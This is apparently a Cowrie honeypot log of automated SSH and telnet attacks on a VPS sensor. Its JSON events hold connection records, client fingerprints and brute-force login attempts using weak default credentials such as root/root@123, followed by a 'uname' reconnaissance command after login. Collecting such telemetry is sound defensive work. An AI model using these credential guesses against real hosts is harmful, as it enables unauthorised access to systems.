{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38860,"dst_ip":"1.2.3.4","dst_port":23,"session":"061a082822e6","protocol":"telnet","message":"New connection: 212.227.235.229:38860 (1.2.3.4:23) [session: 061a082822e6]","sensor":"my-vps","timestamp":"2025-08-31T06:36:33.348610Z"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"12345678","message":"login attempt [ubuntu/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T06:36:36.852111Z","src_ip":"212.227.235.229","session":"d3dd68e77714"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39052,"dst_ip":"1.2.3.4","dst_port":22,"session":"57a23f36265f","protocol":"ssh","message":"New connection: 212.227.125.160:39052 (1.2.3.4:22) [session: 57a23f36265f]","sensor":"my-vps","timestamp":"2025-08-31T06:36:38.074745Z"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:36:38.680128Z","src_ip":"212.227.235.229","session":"d3dd68e77714"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:36:41.857787Z","src_ip":"212.227.125.160","session":"57a23f36265f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:36:41.859495Z","src_ip":"212.227.125.160","session":"57a23f36265f"}
{"eventid":"cowrie.session.closed","duration":12.756312608718872,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:36:46.104860Z","src_ip":"212.227.235.229","session":"061a082822e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39167,"dst_ip":"1.2.3.4","dst_port":23,"session":"fb05a21f4502","protocol":"telnet","message":"New connection: 212.227.235.229:39167 (1.2.3.4:23) [session: fb05a21f4502]","sensor":"my-vps","timestamp":"2025-08-31T06:36:46.338756Z"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:36:51.329609Z","src_ip":"212.227.125.160","session":"57a23f36265f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36128,"dst_ip":"1.2.3.4","dst_port":22,"session":"556896014aa3","protocol":"ssh","message":"New connection: 212.227.125.160:36128 (1.2.3.4:22) [session: 556896014aa3]","sensor":"my-vps","timestamp":"2025-08-31T06:36:51.336895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:36:51.851773Z","src_ip":"212.227.125.160","session":"556896014aa3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:36:51.852480Z","src_ip":"212.227.125.160","session":"556896014aa3"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"12345678","message":"login attempt [ubuntu/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T06:36:54.151061Z","src_ip":"212.227.125.160","session":"556896014aa3"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:36:55.960042Z","src_ip":"212.227.125.160","session":"556896014aa3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48730,"dst_ip":"1.2.3.4","dst_port":22,"session":"94cff3e46fe3","protocol":"ssh","message":"New connection: 212.227.235.229:48730 (1.2.3.4:22) [session: 94cff3e46fe3]","sensor":"my-vps","timestamp":"2025-08-31T06:36:56.297780Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:36:56.351170Z","src_ip":"212.227.125.160","session":"57a23f36265f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:36:56.352365Z","src_ip":"212.227.125.160","session":"57a23f36265f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:36:58.344981Z","src_ip":"212.227.235.229","session":"94cff3e46fe3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:36:58.345626Z","src_ip":"212.227.235.229","session":"94cff3e46fe3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"2.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:36:58.415747Z","src_ip":"212.227.125.160","session":"57a23f36265f"}
{"eventid":"cowrie.session.closed","duration":"20.3","message":"Connection lost after 20.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:36:58.416818Z","src_ip":"212.227.125.160","session":"57a23f36265f"}
{"eventid":"cowrie.session.closed","duration":12.787288427352905,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:36:59.125921Z","src_ip":"212.227.235.229","session":"fb05a21f4502"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39468,"dst_ip":"1.2.3.4","dst_port":23,"session":"19634d9dea6b","protocol":"telnet","message":"New connection: 212.227.235.229:39468 (1.2.3.4:23) [session: 19634d9dea6b]","sensor":"my-vps","timestamp":"2025-08-31T06:36:59.459304Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51950,"dst_ip":"1.2.3.4","dst_port":22,"session":"696c50bfa69f","protocol":"ssh","message":"New connection: 212.227.235.229:51950 (1.2.3.4:22) [session: 696c50bfa69f]","sensor":"my-vps","timestamp":"2025-08-31T06:37:06.182183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:37:06.183529Z","src_ip":"212.227.235.229","session":"696c50bfa69f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:37:06.485712Z","src_ip":"212.227.235.229","session":"696c50bfa69f"}
{"eventid":"cowrie.login.failed","username":"apps","password":"apps","message":"login attempt [apps/apps] failed","sensor":"my-vps","timestamp":"2025-08-31T06:37:07.737119Z","src_ip":"212.227.235.229","session":"696c50bfa69f"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:37:09.040639Z","src_ip":"212.227.235.229","session":"696c50bfa69f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3589,"dst_ip":"1.2.3.4","dst_port":22,"session":"968e797afbfb","protocol":"ssh","message":"New connection: 212.227.235.229:3589 (1.2.3.4:22) [session: 968e797afbfb]","sensor":"my-vps","timestamp":"2025-08-31T06:37:09.171776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:37:09.173662Z","src_ip":"212.227.235.229","session":"968e797afbfb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:37:09.393259Z","src_ip":"212.227.235.229","session":"968e797afbfb"}
{"eventid":"cowrie.login.failed","username":"jacob","password":"password","message":"login attempt [jacob/password] failed","sensor":"my-vps","timestamp":"2025-08-31T06:37:10.308740Z","src_ip":"212.227.235.229","session":"968e797afbfb"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:37:11.530391Z","src_ip":"212.227.235.229","session":"968e797afbfb"}
{"eventid":"cowrie.session.closed","duration":12.680669784545898,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:37:12.139905Z","src_ip":"212.227.235.229","session":"19634d9dea6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39772,"dst_ip":"1.2.3.4","dst_port":23,"session":"a649966fc602","protocol":"telnet","message":"New connection: 212.227.235.229:39772 (1.2.3.4:23) [session: a649966fc602]","sensor":"my-vps","timestamp":"2025-08-31T06:37:12.320595Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58556,"dst_ip":"1.2.3.4","dst_port":22,"session":"61f38fdf5825","protocol":"ssh","message":"New connection: 212.227.125.160:58556 (1.2.3.4:22) [session: 61f38fdf5825]","sensor":"my-vps","timestamp":"2025-08-31T06:37:14.895203Z"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:37:15.725206Z","src_ip":"212.227.235.229","session":"94cff3e46fe3"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53370,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d670852159c","protocol":"ssh","message":"New connection: 217.72.205.35:53370 (1.2.3.4:22) [session: 0d670852159c]","sensor":"my-vps","timestamp":"2025-08-31T06:37:16.834123Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:37:16.835396Z","src_ip":"217.72.205.35","session":"0d670852159c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:37:23.412218Z","src_ip":"212.227.125.160","session":"61f38fdf5825"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:37:23.445173Z","src_ip":"212.227.125.160","session":"61f38fdf5825"}
{"eventid":"cowrie.session.closed","duration":12.795172691345215,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:37:25.115697Z","src_ip":"212.227.235.229","session":"a649966fc602"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40072,"dst_ip":"1.2.3.4","dst_port":23,"session":"4a44d41d8a4c","protocol":"telnet","message":"New connection: 212.227.235.229:40072 (1.2.3.4:23) [session: 4a44d41d8a4c]","sensor":"my-vps","timestamp":"2025-08-31T06:37:25.488623Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52608,"dst_ip":"1.2.3.4","dst_port":22,"session":"d04ef1f5bcc9","protocol":"ssh","message":"New connection: 212.227.235.229:52608 (1.2.3.4:22) [session: d04ef1f5bcc9]","sensor":"my-vps","timestamp":"2025-08-31T06:37:29.565877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:37:30.299543Z","src_ip":"212.227.235.229","session":"d04ef1f5bcc9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:37:30.300284Z","src_ip":"212.227.235.229","session":"d04ef1f5bcc9"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456789","message":"login attempt [ubuntu/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T06:37:36.434066Z","src_ip":"212.227.235.229","session":"d04ef1f5bcc9"}
{"eventid":"cowrie.session.closed","duration":12.68134093284607,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:37:38.169882Z","src_ip":"212.227.235.229","session":"4a44d41d8a4c"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:37:38.278715Z","src_ip":"212.227.235.229","session":"d04ef1f5bcc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40377,"dst_ip":"1.2.3.4","dst_port":23,"session":"ebb0945c5b1f","protocol":"telnet","message":"New connection: 212.227.235.229:40377 (1.2.3.4:23) [session: ebb0945c5b1f]","sensor":"my-vps","timestamp":"2025-08-31T06:37:38.362702Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:37:46.712394Z","src_ip":"212.227.235.229","session":"94cff3e46fe3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:37:46.713089Z","src_ip":"212.227.235.229","session":"94cff3e46fe3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42942,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc2262f1d601","protocol":"ssh","message":"New connection: 212.227.125.160:42942 (1.2.3.4:22) [session: bc2262f1d601]","sensor":"my-vps","timestamp":"2025-08-31T06:37:50.758577Z"}
{"eventid":"cowrie.session.closed","duration":12.737537622451782,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:37:51.099051Z","src_ip":"212.227.235.229","session":"ebb0945c5b1f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:37:51.320205Z","src_ip":"212.227.125.160","session":"bc2262f1d601"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:37:51.320904Z","src_ip":"212.227.125.160","session":"bc2262f1d601"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40685,"dst_ip":"1.2.3.4","dst_port":23,"session":"95eb41f1447a","protocol":"telnet","message":"New connection: 212.227.235.229:40685 (1.2.3.4:23) [session: 95eb41f1447a]","sensor":"my-vps","timestamp":"2025-08-31T06:37:51.346677Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50948,"dst_ip":"1.2.3.4","dst_port":22,"session":"4416e957f909","protocol":"ssh","message":"New connection: 212.227.235.229:50948 (1.2.3.4:22) [session: 4416e957f909]","sensor":"my-vps","timestamp":"2025-08-31T06:37:52.125661Z"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456789","message":"login attempt [ubuntu/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T06:37:53.264385Z","src_ip":"212.227.125.160","session":"bc2262f1d601"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"7.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:37:53.893757Z","src_ip":"212.227.235.229","session":"94cff3e46fe3"}
{"eventid":"cowrie.session.closed","duration":"57.7","message":"Connection lost after 57.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:37:54.001645Z","src_ip":"212.227.235.229","session":"94cff3e46fe3"}
